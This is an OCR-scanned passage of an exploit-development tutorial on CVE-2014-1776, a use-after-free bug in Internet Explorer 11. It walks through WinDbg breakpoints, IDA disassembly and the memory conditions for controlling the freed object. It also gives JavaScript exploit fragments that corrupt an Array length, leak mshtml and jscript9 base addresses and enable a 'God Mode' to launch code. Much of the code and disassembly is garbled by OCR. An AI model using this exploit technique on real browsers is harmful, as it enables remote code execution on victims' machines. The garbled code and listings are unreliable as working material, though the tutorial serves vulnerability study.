The freed object is pointed to by ЕСХ. Let's determine the size of the object: 


0:007» ? 1000 - (@есх & fff) 
Evaluate expression: 1064 = 00000428 





So the object is 0х428 bytes. 


Here's the stack trace: 


0:007» k 10 

ChildEBP RetAddr 

0a53b790 0a7afc25 MSHTML!CMarkup::lsConnectedToPrimaryMarkup 
0a53b7d4 0aa05cc6 MSHTML!CMarkup::OnCssChange+0x7e 
0a53b7dc 0ada146f MSHTML'!CElement::OnCssChange*0x28 


0a53b7f4 0a84de84 MSHTML! CBackgroundInfo::Property<CBackgroundImage>":: 7':: dynamic atexit destructor for 'fieldD 
efaultValue"+0x4a64 


0a53b860 0a84dedd MSHTML!SetNumberPropertyHelper<long,CSetIntegerPropertyHelper>+0x1d3 
0a53b880 0a929253 MSHTML!INUMPROPPARAMS::SetNumberProperty+0x20 
0a53b8a8 0ab8b117 MSHTML!CBase::put_BoolHelper+0x2a 

0a53b8c0 0ab8aade MSHTML!CBase::put_Bool+0x24 

0a53b8e8 0aa3136b MSHTML!GS_VARIANTBOOL+0xaa 

0a53b97c 0aa32ca7 MSHTML!CBase::ContextInvokeEx+0x2b6 

0a53b9a4 0a93b0cc MSHTML!CElement::ContextIlnvokeEx+0x4c 

0a53b9d0 0a8f8f49 MSHTML!CLinkElement::VersionedInvokeEx+0x49 
0a53ba08 6ef918eb MSHTML!CBase::PrivatelnvokeEx+0x6d 

Оа5ЗБабс 6f06abdc jscript9!HostDispatch::CalllnrvokeEx+0xae 

0a53bae0 6f06ab30 jscript9!HostDispatch::PutValueByDispld+0x94 

0a53baf8 6f06aafc jscript9!HostDispatch::PutValue+0x2a 





Now we need to develop a breakpoint which breaks exactly at the point of crash. This is necessary for when 
we remove the flag HPA and ECX points to a string of our choosing. 


Let’s start by putting the following breakpoint right before we allow blocked content in IE: 
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bp MSHTML!CMarkup::IsConnectedToPrimaryMarkup 


The breakpoint will be triggered many times before the crash. Moreover, if we click on the page in IE, the 
breakpoint will be triggered some more times. It's better to put an initial breakpoint on a parent call which is 
called only after we allow blocked content in IE. The following breakpoint seems perfect: 


bp MSHTML!CBase::put_BoolHelper 
When the breakpoint is triggered, set also the following breakpoint: 


bp MSHTML!CMarkup::IsConnectedToPrimaryMarkup 


This last breakpoint is triggered 3 times before we reach the point (and time) of crash. So, from now on we 
can use the following standalone breakpoint: 


bp MSHTML!CBase::put_BoolHelper "bc *; bp MSHTML!CMarkup::lsConnectedToPrimaryMarkup 3; g" 





If you try it, you'll see that it works perfectly! 


Now we can finally try to make ECX point to our string. But before proceeding, disable the two flags HPA 
and UST: 
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Global Flags 


System Registry | Kernel Flags} Image File | Silent Process Exit 


Image: (TAB to refresh) јехр xe Launch 
Stop on exception Disable stack extension 
Show loader snaps 


Enable heap tail checking Enable system critical breaks 
Enable heap free checking Disable heap coalesce on free 
Enable heap parameter checking 

Enable heap validation on call Enable exception logging 


Enable application verifier 


Enable page heap 


Early critical Section event creation 
Stop on user mode exception 


Enable heap tagging by DLP "A Disable protected DLL Y 
= Ig 
Load image using large pages if possib If you entered the correct 
Debugger | image name, these two flags 
Stack Backtrace: (Megs) | were enabled. Now disable 
them as shown here! 


OK Cancel 





Here's the modified javascript code: 
XHTML 


| xmins:v-"urn:schemas-microsoft-com:vml"» 
d id="haed"> 
|E Case Study - STEP 1</title> 


d = function (){ 
xcument.getElementByld("haed") 
SElement("CVE-2014-1776") 
Byld("vml").childNodes[0].appendChild(tmp) 


X 


dev-kiuhnm.rhcloud.com 





EXPLOIT DEVELOPMENT COMMUNITY 


t("div"); 
(0x428/2). гај) 





Remember to set the following breakpoint: 


bp MSHTML!CBase::put BoolHelper "bc *; bp MSHTML!CMarkup::IsConnectedToPrimaryMarkup 3; g" 





When the breakpoint is triggered, you should see something similar to this: 
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ЕТ Pid 4280 - WinDbg:6.3.9600.16384 X86 
File Edit View Debug Window Help 
E al OU P | | DJ Ead Ed E 3 EJ sd C3 E32 | S15 | АА | ЕЧ 


Display format: [Long Hex У | Previous 


1 

1 1 
1 1 
1 1 
1 1 
1 1 
Jd 1 
1 1 
1 1 
10 1 
1 T 
1 1 
1 1 
1 1 
1 1 
1 1 
1 1 
1 1 
1 d 
1 1 
1 1 
1 1 
d 1 
1 1 
1 1 


їл0,Со!0 Sys 0:<іосаі> Proc 000:1068 Thrd 007:12b0 





The UAF 
bug (2) 


We will need to analyze the bug in і 
This time | won't show you how | determined the content of the string step by step because it'd be a very 
tedious exposition and you wouldn't learn anything useful. First РИ show you the relevant graphs so that you 


can follow along even without IDA, and then ГИ show you the complete "schema" used to exploit the UAF 
bug and modify the length of the chosen А 


Ореп іп IDA then press ( ), click on and enter 
. Double click оп the function апа уои! see the crash point: 
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byte ptr [eax*üCh], 
loc 636EhCDD 








eax, [e ] 
esi, [eax*38h] 










» [ecx*«118h] 


loc 636ЕНСЕН 
вах, 


esi 
al 
return 1 














loc 63658283 
: END OF FUNCTION CHUNK FOR ?IsConnectedToPrinaryMarkuptGCHarkupGGQAnEHX2 


jnz loc 63830354 


; START OF FUNCTION CHUNK FOR ?IsConnectedToPrinarygMarkupBWCHMar kupGG QREHXZ 


loc 6383D354: 
push в 
са11 ?GetLookasidePtr2Q@CElenmentG@ABEPAXW4SLOOKASIDE2@1@@2 ; CLlenent::GetLookasidePtr2(CElement::LOOHAS IDE?) 
nou ‚ вах ; this 

call ?GetMarkup@CE lement@@QBEPAUCMarkup@@x2 ; CElenent::GetHarkup(void) 
» Pax 









E 
loc 63650288 
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Тре nodes with the colored background аге the only nodes whose code ме execute. The pink nodes contain 
the crash, whereas the celeste (light blue) nodes contain the overwriting instruction we'll use to modify the 
length of the chosen Array. 


Click on the signature of IsConnectedToPrimaryMarkup, press Ctrl+X and select CMarkup::OnCssChange 
(see again the stack trace above if you need to). Here's the graph of OnCssChange: 
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eax, eax 
10с 63973086 








aC Har kup@@UAE JW4EOnl ssChange@aa?, 





; Attributes: bp-based frame 


; public: virtual long — thiscall Charkup::ünCssChange(enum EünCssChange) 
|?0nCssthangegCHarkupRaUREJUAEOntssChangeRaa? proc near 


byte ptr -2Dh 

dword ptr -2Ch 

byte ptr -28h 

duord ptr -26h 

duord ptr -1Ch 

duord ptr -18h 

duord ptr -14h 

5 dword ptr -18h 

var C- dword ptr -6Ch 
маг h- dword ptr -4 
аға 8- duord ptr 8 


; FUNCTION CHUNK RT 639235E3 SIZE 88080812 BYTES 
AT 63958068 SIZE 98009809 BYTES 
AT 63972001 SIZE 88880886 BYTES 
AT 63974D3D SIZE 88888831 BYTES 
3 FUNCTION CHUNK RT 63D58RBC SIZE 08880888 BYTES 


edi, edi 

ebp 

ebp, esp 

esp, OFFFFFFF8h 

esp, 34h 

eax, ds: security cookie 
eax, esp 

[esp*34h*var 81, eax 

ейх, ds: tls index 

eax, large Fs:2Ch 

ebx 

esi 

esi, ecx 

eax, [eax«edx«^] 

edi 

edi, edi 

byte ptr (е51418811, ОРЕЋ 
ebx, edi 

eax, [eaxth] 

ecx, [eax*120h] ; this 
[ecx+16h], edi 
?InvalidateAtomCache@CProbableRules@@QAEXx2 ; CProbableRules::InvalidateftonCache(uoid) 
ecx, [esi*38Ch] ; this 
?ClearFormatLookupTable@CFormatReuseLookup@@QAEXx2 ; CFormatReuselookup::ClearFormatLookupTable (void) 
eax, [ebptarg_6] 

eax, 3 

al, 3 

loc 63972801 








test [ebp*arg 81, 1 








jz short loc_636EFC1E 
"PEI "PE 
push Аһ 3 START OF FUNCTION CHUNK FOR ?O0nCssChangeGCHarkupGRBUARE ЈучЕОпСѕ5Спапдесваг. 
mou ecx, esi 
call ?ProcessPeerTaskGCHarkup(QREJURPEERTASKEG3QZ ; .) Пос 63972001: ; this 


mov ecx, esi 

call ?RecomputePeers@Charkup@@QAEJX2 ; CHarkup::ReconputePeers(void) 
jnp loc 636EFC18 

; END OF FUNCTION CHUNK FOR ?0n€ssChange@CMarkup@@UAEJW4EOnCss  апдей 42 


Шш 


loc ó36EFC18: 





mov ebx, eax 
test ebx, ebx 
jnz short loc 636EFC8D 












; START OF FUNCTION CHUNK FOR ?0nCssChangefsCHarkuptaaunE.JWaFOnCssCh angela? | 










loc 639235E3: 
nov вах, [esp+40h+uar_2C] 
пр loc 636EFC31 





loc 636EFC31: 
test [ebp+arg 8], 4 
jnz loc 63D58RBC 








81,8 





3068 
Ша = 
test eax, eax 
jz loc 63974058 




















AA M32 ; CHarkupz:HandlePendingFontMappinglInvalidation(bool,bool &) 














ЙЕЈ N32 ; CHarkup::ForceRelayout(bool) 





79: 
ix, (65140841 
x, edi 

IK, вах 

ort loc 636ЕРС88 








[eax+6Ch] ; this 
























edx, offset aRequest ; 
ecx, [esp+40h+uar_28] 
?DDT RTOHGGVE?RUDdtRtomsSPBDG2 ; 001 RTOH(char const x) 
есх, esi ; this 

[esp*s8n*var 28], edi 

[esp*h8h*ear 1C], 820031900һ 
?Root&CHarkupfaaQBEPRUCRootElement(aGeX2 ; CMarkup::Root(void) 


Request" 











[esp+40h+var_18], eax 
eax, [espeh8h«var 28] 
eax 
есх 
есх 
28h 
[esp*56h*var 1^], edx 

ecx, offset MSHTML_DDTRACKER_INFO 
edx 
[esp+4Ch+var_16], edi 
[esprach+uar с], 020048281 
Template 11828 ; Tenplate hb(x,x,X,X,X) 














П 











CDoc::ClearAtVieuportCache (9010) | |10с 63058852: 
ache@CDoc@@QnExx2 16h 
edx 


ecx, 630h 3 ecx controlled! 


?RddInvalidationTaskGCUiewGGQREJPRUCTreeNodeGBl/InvalidationTypeG28G2 ; CUieu::RddInualidationTask(CTreeHode *,CTreeNode::Invalidationlype) 


loc 636EFC8D 





PIE 





; START OF FUNCTION CHUNK FOR 70nCssChange@CMarkup@@UAE Ju 


loc_63D58ABC: 


lea 
mou 
push 
push 
call 
nov 








jmp 


eax, [esp*hüh«var 201 


ecx, esi ; this 

eax ; bool + 

edi ; bool 
?InvalidateFontHappingRCHarkup&GeQREJ NAA наг ; см 
ерх, eax 


loc 636EFC8D 


па 














loc 63D58B65: 
mov eax, [ecx] 
push ecx 
call dword ptr [eax*18h] 

1 loc 636EFCAB 

; END OF FUNCTION CHUNK FOR ?0nCssChange&BCHarkupGaURE JW4HEOnCssChange@aa2 





Here’s the graph of 


; FUNCTION CHUNK RT 63770899 SIZE 88008088 BYTES 





eax, 
short loc 63605288 


loc 6366C528B: 

mou eax, [ecx+268h] 
mou eax, [eax*h8h] 
cnp edi, [eax*3Ch] 
jz loc 63770999 


loc 63770499: 

хаг едх, едх 

inc edx 

jn loc 63605200 
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Next is the graph of 








Here’s the graph of 








tCacheChange(CElemen 


neal 
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And, finally, this is the graph of CView::AddInvalidationTask, the function which contains the overwriting 
instruction (inc): 












311 CUlew::ni 
ечлжэцйЕ 4Р nw 


ETreeHode = :Tnvalidatio 
near 





validatienTask(class CTreeMode = 
ТР МО десш mualidationTupetooz 








byte pt 
duord р 
| dvord ptr 

























































































































mow edi 
push 
mou sp 
[sib 
|push 
push 
maw сх 
ebx 
|test мегі ptr fedi» ja 
liz loc &26t 8639 
т 
esi 
esi, [еррестетај 
byte ptr (ё 514 le 
rt loc 636£ 0638 
t 
Ша 
loc 036Е0589: 
test byte ptr (езін ап), 
jnz loc 63919Е90 
иш = == = 
[106 6зо19ғ%а: : 
а 
[cali тРатетастееннодесн РАИ 16x 2 
[mov esi, сан 
pr їөс, 636ЕйЧ short lec 636Ей628 
Ы = 
[sor eux, eax 
[nav [rbpevar 1c], езі 
[push ecx ; int 
[iea тах, r 24] 
[nov [ebp*var 10], едк 
|push eax ; int 
lea wn] ; this 
(воо 1. едх 
[nov 01, eax 
[nou 1, 
[вом 1, edx 
(точ uj, ебх 
| том (ar В], 01 
[caii = 775йррепай та тесна) остао I np 14r ужат АГ АРВХРАРАХӨ2 m с t oid con 
[nou ebx, eax 
|test ebx, ерх 
Цаг short loc 636E0627 
- ‘= * 
Шығ 
[rouz тах. word ptr [esiekóh] 
[nov ck, OFFFFR 
cnp ax, cx 
jnh short loc &36rB520 
tt 
huoc S260 0520: 
[or duord ptr [esienAh], 
r-1— TE = 
Шас 
| 
[1oc. 636£ 0627 : 
[mow еск, [ebprarg ^] 
Е 
loc 63680628 : 
al, [edie 1 
al, al 
loc 636t2451 
ecx, ecx 
| loc 63660638 
* 
= int 
push ecx ; dmt 
nov i tnis 
nou al 
call TFosLCloseUtewICU Leva] AEXHMRZ 
јер loc 636-0638 
тўтї 


loc 636Е 0638: 
[pop esi 














lec 
pep 
тоу 
рор 
тоу 
pop 
retn 

raddInvalidationTaskBECUieuaxa]nr JPRUCTIeeHodel uw поэта 1411 оа гүргізгініг endp 
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Here’s the schema | devised: 


Conditions to control the bug and force an INC of dword at magic addr + 0x1b: 


X = [ptr+OA4h] ==> У = [X*Och] ==> 
[Y+208h] is 0 
[¥+630h+248h] = [Y*878h] val to inc! < 
[Y+630h+380h] = [Y+9b0h] has bit 16 set 
[Y+630h+3f4h] = [Y*0a24h] has bit 7 set 
[Y+1044h] is 0 

О = [ptr+118h] ==> is 0 => V = [U-24h] => W = [V+1ch], 
[W+0ah] has bit 1 set & bit 4 unset 
[W+44h] has bit 7 set 
[W+5ch] is writable 

[ptr+198h] has bit 12 set 





Let’s consider the first two lines: 


X = [ptr+OA4h] ==> Y = [Х+Осћ] ==> 


[Y+208h] is 0 





The term ptr is the dangling pointer (which should point to our string). The two lines above means [\+2081] 
must be 0, where Y is the value at X+Och, where X is the value at ptr+0a4h. 


Deducing such a schema can be time consuming and a little bit of trial and error may be necessary. The 
goal is to come up with a schema that results in an execution path which reaches the overwriting instruction 
and then resume the execution of the javascript code without any crashes. 


It's a good idea to start by identifying the must-nodes (in IDA), i.e. the nodes that must belong to the 
execution path. Then you can determine the conditions that must be met to make sure that those nodes 
belong to the execution path. Once you’ve done that, you start exploring the graph and see what аге the 
suitable sub-paths for connecting the must-nodes. 


You should check that the schema above is correct by looking at the graphs and following the execution 
path. 
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IE11: Part 2 


Completing the exploit 


As we saw, the POC uses because it requires that the javascript code is executed after the 
page has fully loaded. We must do the same in our exploit. We also need to make the required changes to 
the rest of the page. Here’s the resulting code: 


XHTML 
| id="haed" 
IE Case Study - STEP1 
v\:*{Behavior: url(#default#VML)} 


neta http-equiv="X patible" content="IE=EmulatelE9" 


len = (0x10000 - | 


гау(); 
0; i < 0x1000; ++) ( 
) 


= 0xc000000; 


'Modify the V'Buffer length\" field of the Array at Ox" 


Х 5-1: 
ar | = 0; i < 0х1000 - 1; ++i) { 


+ header. size/4] = 1; 
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i[idx][array. len + 0x14/4] = Ox3fffffff; 
ах]. + 0x18/4] = Ox3fffffff; 

i[idx-- 1].length = ОхЗЕ 
var I addr = mag idr + 0x10000 + 


on int2uint(x) { 
rn (x < 0) ? 0x100000000 + 


on uint2int(x) { 
гп (x >= 0x80000000) 2 x - 0x100000000 : x; 


[idx-- 1][(0x100000000 + d 


(а >= 0) 
alidx+1][delta/4] = 


| x--1]I(0x100000000 + lelta)/4] = 
} 


http: 
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[idx+2][0] = obj; 
return (ба 


) 


+ 0x10000); 


t addr(document 
(адаг) - Ox2d50; 
Ir + 0x10) - Ox1569ce; 


ad(mshtml-*0xebcd98 0x10); 
i(n +0xebcd98+0x14); 


function GodMod 04 
te(mshtml+0xebcd98+0x10, )+0х155е19); 
tml+0xebcd98+0x14, јѕсгірі9+0х155а7а); 


1d(bStream_addr + 0x50) + 0x44): 
‚ 0х003а0043); 
+ 4, 0х0000005с); 


( 


(fi ‚2 
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h * 0x100)); 


| snipped . You сап download the ІШІ code from here: содеб. 


When we try it, a familiar dialog box pops up: 
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Internet Explorer 


i An ActiveX control on this page might be unsafe to interact 
? with other parts ofthe page. Do you wantto allow this 
interaction? 





This means that something changed and the God Mode doesn't work anymore. 


Let's start by adding two alerts to check that the variables and contain the correct base 
addresses: 


JavaScript 


addr = get addr(document.createElement("div")); 
jscript9 = read(addr) - 0х2450; 
mshtml = read(addr + 0x10) - 0x1569ce; 
alert(jscript9.toString(16)); 
alert(mshtml.toString(16)); 





When we reload the page in IE we discover that the two variables contain incorrect values. Let's modify the 
code again to find out what’s wrong: 


JavaScript 


addr = get addr(document.createElement("div")); 
alert(addr.toString(16)); 
jscript9 = read(addr) - 0х2450; 
mshtml = read(addr + 0x10) - 0x1569ce; 





When we analyze the object at the address , We realize that something is missing: 
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0:021> аа 676210107210) 
03с600е0 6cd75480 03c54120 00000000 03c6cfa0 
03c600f0 02964820 03c6af44 03c6af74 00000000 
03c60100 6cd7898c 00000001 00000009 00000000 
03c60110 0654d770 00000000 00000000 00000000 
03c60120 6cd75480 03c54120 00000000 03c6c000 
03c60130 029648а0 03c6a3d4 03c6af44 00000000 
03c60140 6cd75480 03c54120 00000000 03c6cfbO 
03c60150 029648а0 029648c0 03c60194 00000000 
0:021» п 6cd75480 
(6cd75480) jscript9!HostDispatch:: vftable' | (6cd755d8) jscript9!Js::ConcatStringN<4>:: vftable' 
Exact matches: 

jscript9! HostDispatch:: vftable' = «no type information? 
0:021» In 029648a0 
0:021» dds 3c600e0 
03c600e0 6cd75480 jscript9! HostDispatch:: vftable' 
03c600e4 03c54120 
03c600e8 00000000 
03c600ec 03c6cfa0 
03c600f0 029648a0 
03c600f4 03c6af44 
03c600f8 03c6af74 
03c600fc 00000000 
03c60100 6cd7898c jscript9!HostVariant:: vftable' 
03c60104 00000001 
03c60108 00000009 
03c6010c 00000000 
03c60110 0654d770 
03c60114 00000000 
03c60118 00000000 
03c6011c 00000000 
03c60120 6cd75480 jscript9! HostDispatch:: vftable' 
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03c60124 03c54120 
03c60128 00000000 
03c6012c 03c6c000 
03c60130 029648a0 
03c60134 03c6a3d4 
03c60138 03c6af44 
03c6013c 00000000 
03c60140 6cd75480 jscript9! HostDispatch:: vftable' 
03c60144 03c54120 
03c60148 00000000 
03c6014c 03c6cfbO 
03c60150 029648a0 
03c60154 029648c0 
03c60158 03c60194 
03c6015c 00000000 





How сап we determine the base address of mshtml.dll without a pointer to a vftable in it? 


We need to find another way. For now, we learned that the div element is represented by an object of type 
jscript9!HostDispatch. But we've already seen this object in action. Do you remember the stack trace of the 
crash? Here it is again: 

0:007> k 10 

ChildEBP RetAddr 

0a53b790 0a7afc25 MSHTML!CMarkup::lsConnectedToPrimaryMarkup 

0a53b7d4 0aa05cc6 MSHTML!CMarkup::OnCssChange+0x7e 

0a53b7dc 0ada146f MSHTML!CElement::OnCssChange+0x28 


0a53b7f4 0a84de84 MSHTML! CBackgroundinfo::Property<CBackgroundImage>":: 7':: dynamic atexit destructor Тог Пејар 
efaultValue"+0x4a64 


0a53b860 0a84dedd MSHTML!SetNumberPropertyHelper<long,CSetIntegerPropertyHelper>+0x1d3 
0a53b880 0a929253 MSHTML!INUMPROPPARAMS::SetNumberProperty+0x20 

0a53b8a8 0ab8b117 MSHTML!CBase::put_BoolHelper+0x2a 

0a53b8c0 0ab8aade MSHTML!CBase::put_Bool+0x24 

0a53b8e8 0aa3136b MSHTML!GS_VARIANTBOOL+0xaa 

0a53b97c 0aa32ca7 MSHTML!CBase::ContextInvokeEx+0x2b6 
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In particular, look at these two lines: 





It's clear that jscript9!HostDispatch::CalllnvokeEx knows the address of the function 
MSHTML!CBase::PrivatelnvokeEx and if we're lucky, this address is reachable from the object HostDispatch 
(remember that we know the address of an object of this very type). 


Let's examine jscript9!HostDispatch::CalllnvokeEx in IDA. Load jscript9 in IDA and then press Ctrl+P to 
locate CallinvokeEx. Now you can click on any instruction to see its offset relative to the current function. We 
want to locate the instruction at offset Oxae of CalllnvokeEx: 
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:egular function Unexplored Instruction External symbol 


ПЕ II A Hex View-1 [А] Structures Enums Га Imports Exports 





eax, [edi*18h] 

esi 

eax, [eaxth] 

eax, [eaxt+224h] 
Геврғуағ 141, eax 

еах, [esi] 

dword ptr [еах+4] 

eax, [ebp*var 101 

ерх, dword ptr [ebp*arg 4] 
dword ptr [eax+48Ch], 4 
10с 18881050 


loc 18881801: 

mov edi, [ebp*var 18] 

push edi 

push [ebp*arg 18] 

push [ebp*arg С 
[ebp*arg | 





loc 188B18DE: 
eax, [esi] 
ebx 
[ebp*var 14] 
[ebp*arg 81 
esi 
duord ptr [eax+20h] 
ebx, eax 


00BOCE7 1 





It looks like the address of is at the address : 


As we did with the UAF bugs, we'll try to determine where the address of 
comes from: 
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..int32  thiscall HMostDispatch::CalllInvokeEx(HostDispatch *this, ^ int32, unsigned 11:16, struct tagDISPPRRRHS >, struct tagURRIRHT =, struct tagEXCEPIHFÜ >) 
TCalllinuokeExGHostDispatch(GEGRRE.JJGPRUCtagDISPPRRAHSGGPRUCagUARRIRNTGEGPRUCagEXCEPINFOGGS? proc near 


dword ptr -26h 
dword ptr -28h 
byte ptr -254h 
dvord ptr -20h 
dword ptr —1Ch 
dword ptr -18h 
dvord ptr -1uh 
dvord ptr -10nh 
dword ptr -ч For now we have: 


dword ptr 8 кё 
word ptr ОС x var_14 


dword ptr 10h obj ptr = [X+10h] 

dword ptr лаһ 
ar ð- dword ptr 18h 4 
5 EOS We need to examine 


төв GetHostVariantWrapp 


29]. 
eax, [edish] 
[ebpevear 15], 

ц 


Hostbispatch::GetHostUariantWrapper(HostUariant = =) 





е 

eax, 

ecx, ebx 

вах 

Гейржоаг 201, ебх 

[ebp*var 28], eax 

?7$LeaueScriptStartis$60$009ScriptContext(3JsG9QAE НРӨХГ2 ; Js: :ScriptContext::LeaveScriptStart<1,1>(void =) 
Гейреоаг 25], al 

[ebpsvar 81, 0 

тах, [ebp*var 18] 

ecx, [еаі +101] this 

eax ; struct DispatchExCaller == 
?GetDispatchExCallerGScriptSiteGGQREJPahPRUDispatchExCaller(xXX32 ; ScriptSite:-:GetDispatchExCaller(DispatchExCaller 
ebx, eax 

ebx, ebx 

short loc 100B18FF 











eax, [edi«10h] 


eax, [eax*h] 

eax, [eaxe225h] 

[ерр+и 15], eax 

eax, ] 

dword ptr [eax*^] 

eax, [ebpe«var 1C] 

ебх, dword ptr [ebpearg 4] 
dword ptr [eax*&8Ch], Ч 
loc 10081С50 






loc 18081801: 
edi, [ebp*var 181 
edi 
[ebp*arg 19] 
[ebpearg €] 
[ebprarg 8] 


In all probability, 


ESI = ptr to object 
EAX z ptr to vftable 


















dword ptr [еах+8] 
пом есх, [ebp«var 20] 
pusn edi 3 struct DispatchExCaller = 
ecx, [ecx«1B8h] = this 

?ReleaseDispatchExCaller@scriptSiteG@gaExPaupispatchExCaller@@@2 ; Script&ite-:ReleaseDispatchExCaller(DispatchExCaller *) 





















loc 108B18FF: 
or Гевреиа- 8), UüFFFFFFFFh 
стр [ebptuar 25], 8 

short loc 10881918 









eax, [ebp*var 16] 
есх 

ecx, [eax+248h] 
+751 еаџезсгјрЕЕпоасоватп"еадсопсех секаопЕхРАахаг ; ThreadContext::LeaveScriptEnd<1>(uoid жу 











10081918 
eax, ebx 





loc 10081918: 


. FH epilog3 
14h 
?Call InvokeEx@HostDispatch@@AAEJJGPAUtagD I SPPARAMS@E@PAUtagUAR | ANTE@PAUtagEXCEP 1 НЕ 0062 endp 
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; Rttributes: bp-based frame 


; | int32  thiscall HostDispatch::GetHostUariantWrapper(HostDispatch «this, struct HostUariant жер uar 1h) 
?GetHostUariantWrapper&HostDispatch&XsanaEJPRPaUHostUariant&eez7 proc near 


р var 14- duord ptr 


eax, [ebp*p var 14] 

[Pax], ёсх loc 10081941: 
nou eax, 88 
jnp short loc 188B193D 
?G&etHostUariantWrapper&HostDispatch(XanaEJPRPRUHostUariantixxs2 endp 





loc 188B193D: 
pop ebp 
retn 4 





By merging the schemata, we get the following: 


X = [this*Och] 
var 14 = [X+8] 

X = var. 14 

obj ptr = [X+10h] 





More simply: 


X = [this+Och] 
X = [X+8] 


obj ріг = [X+10h] 





Let's see if we're right. Let's reload the html page in IE and examine the div element again: 
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0:022» dd 5360f20 
05360120 6сс55480 05354280 00000000 0536cfbO 
05360f30 0419adb0 0536af74 0536afa4 00000000 
05360f40 6cc5898c 00000001 00000009 00000000 
05360f50 00525428 00000000 00000000 00000000 
05360f60 05360f81 00000000 00000000 00000000 
05360170 00000000 00000000 00000000 00000000 
05360f80 05360fa1 00000000 00000000 00000000 
05360f90 00000000 00000000 00000000 00000000 
0:022» In 6cc55480 
(6cc55480) jscript9!HostDispatch:: vftable’ | (6cc555d8) jscript9!Js::ConcatStringN<4>:: ућабје' 
Exact matches: 

jscript9! HostDispatch:: vftable' = «no type information? 
0:022» dd poi(5360f20+c) 
0536сї00 6сс52444 00000001 05360100 00000000 
0536сїс0 6cc52d44 00000001 05360f40 00000000 
0536сї40 0536сїе1 00000000 00000000 00000000 
0536cfe0 0536с1 00000000 00000000 00000000 
0536cffO O0536cf71 00000000 00000000 00000000 
05364000 бсс54534 053548с0 00000000 00000005 
05364010 00004001 04710010 053578с0 00000000 
05364020 00000001 05338760 00000000 00000000 
0:022» In 6cc52d44 
(6сс52444) jscript9!DummyVTableObject:: vftable' | (6сс52950) јѕсгір{9!Ргојесіоп::АггауОбјесїпѕїапсе 
Exact matches: 


jscript9! Projection::UnknownEventHandlingThis:: vftable' = <по type information> 


jscript9! Js::FunctionI|nfo:: vftable' = <no type information> 


jscript9! Projection::UnknownThis:: vftable' = «no type information? 
jscript9! Projection:: Namespace This:: vftable' = «no type information? 
jscript9! Js::WinRTFunctionInfo:: vftable' = «no type information? 
jscript9! RefCountedHostVariant:: vftable' = «no type information? 


jscript9! DummyVTableObject:: vftable' = <no type information> 


:" vftable' 
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jscript9! Js::FunctionProxy:: мћабје' = <no type information> 
0:022» dd роі(роі(5360#20+с)+8) 
05360f00 6cc5898c 00000005 00000009 00000000 
05360f10 00565488 00000000 00000000 00000000 
05360120 6сс55480 05354280 00000000 0536cfbO 
05360f30 0419adb0 0536af74 0536afa4 00000000 
05360f40 6cc5898c 00000001 00000009 00000000 
05360f50 00525428 00000000 00000000 00000000 
05360f60 05360f81 00000000 00000000 00000000 
05360170 00000000 00000000 00000000 00000000 
0:022» In 6cc5898c 
(6cc5898c) jscript9!HostVariant:: vftable' | (6cc589b5) jscript9!Js::CustomExternalObject::SetProperty 
Exact matches: 

jscript9! HostVariant:: vftable' = «no type information? 
0:022> dd poi(poi(poi(5360f20+c)+8)+10) 
00565d88 6f03eb04 00000001 00000000 00000008 
00565d98 00000000 05360f08 00000000 00000000 
00565da8 00000022 02000400 00000000 00000000 
00565db8 07447798 07447798 5c0cccc8 88000000 
00565dc8 00320043 0057005c 00660069 006f0064 
00565dd8 00730077 0073005c 00730079 00650074 
00565de8 00330064 005c0032 00580053 002е0053 
00565df8 004с0044 0000004c 5сОсссбо 88000000 
0:022» In 6f03eb04 
(6f03eb04) MSHTML!CDivElement:: vftable' | (6ede7f24) MSHTML!s propdescCDivElementnofocusrect 
Exact matches: 


MSHTML!CDivElement:: vftable' = «no type information? 





Bingo! Our problems are solved! Now let’s compute the RVA of the vftable just found: 


0:005» ? 6f03eb04-mshtml 


Evaluate expression: 3861252 - 003aeb04 





We also need to compute the RVA for jscript9!HostDispatch:: vftable’: 
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0:005> ? 6cc55480-jscript9 


Evaluate expression: 21632 = 00005480 





Now change the code as follows: 


JavaScript 


| Ir(d | | 
J(addr) - 0х5480; 
(геа read(addr + Oxc) + 8) + 0x10)) - ОхЗаер04: 





Try it out: is should work just fine! 


Now remove the two alerts and the return. Mmm... the calculator doesn't appear, so there must be 
something wrong (again!). To see what's wrong, we can rely on the Developer Tools. It seems that when the 
Developer Tools are enabled our God Mode doesn’t work. Just authorize the execution of the АспуехОбјес! 
and you should see the following error: 
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ptr [espe] 
[есх+4].6 

serApcExceptionHandler+O0xf (778с0014) 
estAlert (778414с0) 


2DCh] 

ptr 55:10) 

Насан лек ас а ter (778c0010) 
вах] 


E 100400000Ь1, eax 
0Ch] 


ptr разг) 
fs:[0].ecx 


р 


~ data = window.atob(b64Data); 


80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 


guUUUUUZ 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
UNDE 


ANANIA 


BUUUUUUZ 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 


^^n^o^on^ өө 


ect doesn't support property or method 'atob' 4 Main fran 


Luckily, the problem is quite simple: 


+ 


BUUUUUUZ 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 


80000002 80 


90900907. бө 


0202007 


SUUUUUUZ 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
000002 


UUUUUUUZ 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 


isn't available in IE 9. | found a polyfill for atob here: 


NANDI ^n 


uuUUUUUZ 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 
80000002 


обовол 


BUUUUUU?2 | 
80000002 | 
80000002 
80000002 | 
80000002 | 
80000002 | 
80000002 = 
80000002 | 
80000002 
80000002 
80000002 
80000002 | | 
80000002 | 
80000002 | 
80000002 | 
80000002 | 
80000002 ~ 
80000002 
80000002 = 


"бле еб б. 


https://github.com/Modernizr/Modernizr/wiki/H T ML5-Cross-Browser-Polyfills#base64-windowatob-and- 


windowbtoa 
Here's the modified code: 
XHTML 


